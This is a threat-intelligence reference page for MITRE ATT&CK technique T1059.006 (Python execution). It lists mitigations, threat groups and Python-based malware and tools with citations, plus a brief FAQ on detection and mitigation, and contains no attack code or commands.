Description
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Reverse Shell Cheatsheet
Read our in-depth pentesting guide related to this technique
Platforms
Mitigations (4)
AuditM1047
Inventory systems for unauthorized Python installations.
Antivirus/AntimalwareM1049
Anti-virus can be used to automatically quarantine suspicious files.
Limit Software InstallationM1033
Prevent users from installing Python where not required.
Execution PreventionM1038
Denylist Python where not required.
Threat Groups (18)
| ID | Group | Context |
|---|---|---|
| G0067 | APT37 | [APT37](https://attack.mitre.org/groups/G0067) has used Python scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021) |
| G0060 | BRONZE BUTLER | [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019) |
| G0131 | Tonto Team | [Tonto Team](https://attack.mitre.org/groups/G0131) has used Python-based tools for execution.(Citation: TrendMicro Tonto Team October 2020) |
| G0128 | ZIRCONIUM | [ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Python-based implants to interact with compromised hosts.(Citation: Google Election Threat... |
| G0106 | Rocke | [Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019... |
| G0095 | Machete | [Machete](https://attack.mitre.org/groups/G0095) used multiple compiled Python scripts on the victim’s system. [Machete](https://attack.mitre.org/grou... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used Python scripts to enumerate ESXi hosts and guest VMs.(Citation: Google Cloud Threat Intellig... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca... |
| G0069 | MuddyWater | [MuddyWater](https://attack.mitre.org/groups/G0069) has developed tools in Python including [Out1](https://attack.mitre.org/software/S0594).(Citation:... |
| G1052 | Contagious Interview | [Contagious Interview](https://attack.mitre.org/groups/G1052) has used the Python-based malware such as [InvisibleFerret](https://attack.mitre.org/sof... |
| G1021 | Cinnamon Tempest | [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) has used a customized version of the [Impacket](https://attack.mitre.org/software/S0357) wmi... |
| G0010 | Turla | [Turla](https://attack.mitre.org/groups/G0010) has used IronPython scripts as part of the [IronNetInjector](https://attack.mitre.org/software/S0581) t... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: Symantec Seaduke 2015) |
| G0087 | APT39 | [APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer M... |
| G1039 | RedCurl | [RedCurl](https://attack.mitre.org/groups/G1039) has used a Python script to establish outbound communication and to execute commands using SMB port 4... |
| G1055 | VOID MANTICORE | [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has utilized Python scripts to execute its malicious payloads.(Citation: FBI IC3 Flash VOID MA... |
| G0035 | Dragonfly | [Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including Python scripts. The group was ... |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collec... |
Associated Software (37)
| ID | Name | Type | Context |
|---|---|---|---|
| S0581 | IronNetInjector | Tool | [IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Uni... |
| S0547 | DropBook | Malware | [DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020) |
| S1218 | VIRTUALPIE | Malware | [VIRTUALPIE](https://attack.mitre.org/software/S1218) is a Python-based backdoor malware.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(C... |
| S0196 | PUNCHBUGGY | Malware | [PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019) |
| S0695 | Donut | Tool | [Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Python.(Citation: Donut Github) |
| S0681 | Lizar | Malware | [Lizar](https://attack.mitre.org/software/S0681) has used Python scripts (ps2x.py script and ps2p.py) to execute files on remote hosts using the [Impa... |
| S1217 | VIRTUALPITA | Malware | [VIRTUALPITA](https://attack.mitre.org/software/S1217) can call a Python script to run commands on a targeted guest virtual machine.(Citation: Google ... |
| S0374 | SpeakUp | Malware | [SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019) |
| S1187 | reGeorg | Malware | [reGeorg](https://attack.mitre.org/software/S1187) is a Python-based web shell.(Citation: GitHub reGeorg 2016) |
| S1032 | PyDCrypt | Malware | [PyDCrypt](https://attack.mitre.org/software/S1032), along with its functions, is written in Python.(Citation: Checkpoint MosesStaff Nov 2021) |
| S0583 | Pysa | Malware | [Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020) |
| S0387 | KeyBoy | Malware | [KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2... |
| S0332 | Remcos | Tool | [Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018) |
| S1189 | Neo-reGeorg | Malware | [Neo-reGeorg](https://attack.mitre.org/software/S1189) is a Python-based web shell.(Citation: GitHub Neo-reGeorg 2019) |
| S9024 | SPAWNCHIMERA | Malware | [SPAWNCHIMERA](https://attack.mitre.org/software/S9024) has searched the contents of two Python files scanner.py and scanner_legacy.py by searching fo... |
| S0482 | Bundlore | Malware | [Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019) |
| S1035 | Small Sieve | Malware | [Small Sieve](https://attack.mitre.org/software/S1035) can use Python scripts to execute commands.(Citation: NCSC GCHQ Small Sieve Jan 2022) |
| S1223 | THINCRUST | Malware | [THINCRUST](https://attack.mitre.org/software/S1223) can use Python scripts for command execution.(Citation: Mandiant Fortinet Zero Day) |
| S0692 | SILENTTRINITY | Tool | [SILENTTRINITY](https://attack.mitre.org/software/S0692) is written in Python and can use multiple Python scripts for execution on targeted systems.(C... |
| S0631 | Chaes | Malware | [Chaes](https://attack.mitre.org/software/S0631) has used Python scripts for execution and the installation of additional files.(Citation: Cybereason ... |
Related CWE Weaknesses
References
Frequently Asked Questions
What is T1059.006 (Python)?
T1059.006 is a MITRE ATT&CK technique named 'Python'. It belongs to the Execution tactic(s). Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactiv...
How can T1059.006 be detected?
Detection of T1059.006 (Python) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1059.006?
There are 4 documented mitigations for T1059.006. Key mitigations include: Audit, Antivirus/Antimalware, Limit Software Installation, Execution Prevention.
Which threat groups use T1059.006?
Known threat groups using T1059.006 include: APT37, BRONZE BUTLER, Tonto Team, ZIRCONIUM, Rocke, Machete, UNC3886, Earth Lusca.